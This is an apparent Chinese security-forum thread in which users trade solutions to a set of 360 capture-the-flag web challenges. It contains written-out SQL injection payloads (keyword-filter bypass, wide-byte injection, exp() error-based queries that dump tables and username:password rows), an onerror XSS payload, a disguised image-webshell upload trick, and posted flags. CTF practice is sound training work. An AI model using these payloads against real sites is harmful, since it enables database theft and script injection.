关于360出的10道测试题的解题思路。(上篇)
第一道题:http://103.238.227.13:10087/index.php?id=x文中可以看看出过滤了注入关键字。
然后测试发现在拦截的字中加入<>即可绕过。
出来了库,然后表与字段告诉了,那么就可以直接查询数据了。
第二题:http://103.238.227.13:10083/index.php?id=1
测试发现是宽字节注入。
注入的老办法出了数据。
第三题:http://103.238.227.13:10088/index.php?id=1
root写文件,但是却过滤了union。这里说一种另类方式读取文件。
这里利用了数字运算函数exp()报错溢出数据。
//通过exp()函数报错注入。
' or exp(~(select*from(select user())a))%23//查询数据库,版本,用户。
爆表语句:
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
爆列语句:
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
爆数据:
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
想了解的可以百度下。
第四题:http://103.238.227.13:10086/
抓包是一项比较实用的办法有时。
第五题:http://103.238.227.13:10085/
分享到此结束了。以上思路都是wuyan表哥提供。有兴趣的朋友可以去试试。剩下的5道我就不会了!还望表哥些能分享下,可以写个帖子,也可以做了出来就在评论中指导下!
剩下⑤道题的地址:
http://103.238.227.13:10082/
http://103.238.227.13:10081/
http://103.238.227.13:10080/
http://103.238.227.13:10089/
http://103.238.227.13:10084/index.php?id=x
可以可以,继续努力
RE: 关于360出的10道测试题的解题思路。(上篇)
wuyan 发表于 2016-11-1 20:55可以可以,继续努力
哈哈,膜拜表哥!多带带我们哦! 其实对我来说直接就枚举他的get值。哈哈 xss哪一题我解出来了,Flag:17f094325e90085b30a5ddefce34acd8 说一下思路吧,
1:首先页面获取的是id参数的值,那么我们就需要根据id来设置值,例如:id=xxxxx
2:页面过滤了< "所以要把这些绕过
3:绕过这个可以百度照一下我是百度找的方法
4:利用javascript的onerror事件触发
最后成品地址:http://103.238.227.13:10089/?id=\u003cimg%20src=x%20onerror=eval(alert(_key_));\u003e
RE: 关于360出的10道测试题的解题思路。(上篇)
m7lrv 发表于 2016-11-2 10:02xss哪一题我解出来了,Flag:17f094325e90085b30a5ddefce34acd8 说一下思路吧,
1:首先页面获取的是id参 ...
谢谢表哥!我也是去学习一下。 文件上传那个道题目答案是:Flag:b72bdc2c1f7f3448ca3e72a9b57e596a
1:找个一个合成好的图片马
2:上传图片,修改filename="m7lrv.php1.jpg"
然后答案就出来了,不知道这算什么题目,如果有解析漏洞的话好像可以解析,php1 这种会被解析为php文件
RE: 关于360出的10道测试题的解题思路。(上篇)
m7lrv 发表于 2016-11-2 15:44文件上传那个道题目答案是:Flag:b72bdc2c1f7f3448ca3e72a9b57e596a
1:找个一个合成好的图片马
2:上传图 ...
么么哒,有请表哥继续分享。我也去尝试下!:loveliness: 第一个绕过直接大小写混着来就可以了吧,类似SelEcT
RE: 关于360出的10道测试题的解题思路。(上篇)
SVK 发表于 2016-11-2 18:53第一个绕过直接大小写混着来就可以了吧,类似SelEcT
不行,你试试就知道了1
页:
[1]